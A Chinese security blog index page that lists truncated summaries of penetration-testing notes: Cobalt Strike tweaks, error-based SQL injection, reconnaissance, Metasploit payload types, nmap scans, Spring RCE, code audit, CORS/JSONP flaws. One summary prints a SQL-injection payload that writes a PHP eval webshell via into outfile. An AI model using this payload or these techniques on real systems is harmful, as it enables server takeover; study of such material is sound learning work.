摘要: ## 一,前言 最近老大让我改一下cs功能方便获取流量,让人工智能学习。对此我加了三个功能,批量执行命令,批量上传文件,批量下载文件。 机会难得,我顺便研究了一下cs rce,其中有个坑是svg文件和远程加载的jar包主机不一致,导致报错 ## 二,环境 cs4.0 jdk8 python 3.8. 阅读全文
posted @ 2023-07-21 17:14 lzstar-A2 阅读(191) 评论(0) 推荐(0) 编辑
摘要: 报错注入:适用于数据库报错会将报错信息带到页面数据库名为test①、floor报错注入floor():向下取整,比如0.6返回0,1.1返回1Rand():返回0到1的随机数floor( RAND()*2):返回0或1select count(*),CONCAT(database(),floor( 阅读全文
posted @ 2022-08-12 15:24 lzstar-A2 阅读(176) 评论(0) 推荐(0) 编辑
摘要: 主要是收集服务器的配置信息和网站的敏感信息,其中包括域名及子域名信息、目标网站系统,cms指纹、目标网站真实ip、开放的端 口。 通过站长之家查看ip,或使用各种多地 ping 的服务,查看对应 IP 地址是否唯一,如果不唯一多半是使用了CDN,需寻找真实ip通过网络空间搜索引擎,nmap,御剑等来 阅读全文
posted @ 2022-07-31 20:20 lzstar-A2 阅读(101) 评论(0) 推荐(0) 编辑
摘要: 1.关键词 (1)reverse_tcp木马会主动连接目标服务器(2)bind_tcp木马会监听本地的端口 2.msf各模块①exploits漏洞利⽤模块,这个模块通常是⽤于对某些有可能存在漏洞的⽬标进⾏漏洞利⽤。②payloads攻击载荷,exploit成功之后就会执⾏payload,这段payl 阅读全文
posted @ 2022-07-31 00:28 lzstar-A2 阅读(773) 评论(0) 推荐(0) 编辑
摘要: 钟馗之眼(https://www.zoomeye.org/)撒旦(国外)FOFA(https://fofa.info/toLogin)fofa搜漏洞教程https://blog.csdn.net/hackzkaq/article/details/118731909?spm=1001.2101.300 阅读全文
posted @ 2022-07-31 00:20 lzstar-A2 阅读(1589) 评论(0) 推荐(2) 编辑
摘要: nmap:主机发现,端口扫描,服务和版本探测,操作系统探测参数:1.常用扫描①ping扫描nmap -sP www.hackstar.topping扫描,Nmap在扫描端口时,默认都会使用ping扫描,只有主机存活,Nmap才会继续扫描②TCP扫描nmap -sT www.hackstar.top 阅读全文
posted @ 2022-07-25 19:34 lzstar-A2 阅读(2363) 评论(0) 推荐(0) 编辑
摘要: spring远程命令执行漏洞受影响的版本1)使用了JDK 9及以上2)Spring 框架以及衍生的框架spring-beans-*.jar 文件或者存在CachedIntrospectionResults.classhttps://blog.csdn.net/nethackatschool/arti 阅读全文
posted @ 2022-07-24 20:48 lzstar-A2 阅读(589) 评论(0) 推荐(0) 编辑
摘要: 定义:一种以发现程序错误,安全漏洞和违反程序规范为目标的源代码分析如何做代码审计的手工和工具相结合的方式工具:Fortify SCA手工1.敏感函数①命令执行函数(Runtime.getRuntime()、.exec()、start()、ProcessBuilder())等②文件上传函数(Servl 阅读全文
posted @ 2022-07-24 20:44 lzstar-A2 阅读(864) 评论(0) 推荐(0) 编辑
摘要: 同源策略浏览器的一个安全策略域名,端口,协议相同才算同源不同源的不能相互获取cookie,document,不能相互发ajax请求但这给开发造成了不便,所以就有了跨域问题,CORS和jsonp是解决跨域问题的一种方案,如果配置的不规范,可能会造成CORS跨域资源共享漏洞和jsonp劫持漏洞java不 阅读全文
posted @ 2022-07-24 20:06 lzstar-A2 阅读(503) 评论(0) 推荐(0) 编辑
摘要: mysql条件:root权限网站的绝对路径且具有写入权限secure_file_priv为空(第四条可以绕过) -01-通过outfile写入shellunion select 1,"<?php eval($_REQUEST[8])?>" into outfile 'C:/phpStudy/WWW/ 阅读全文
posted @ 2022-07-19 14:32 lzstar-A2 阅读(460) 评论(0) 推荐(0) 编辑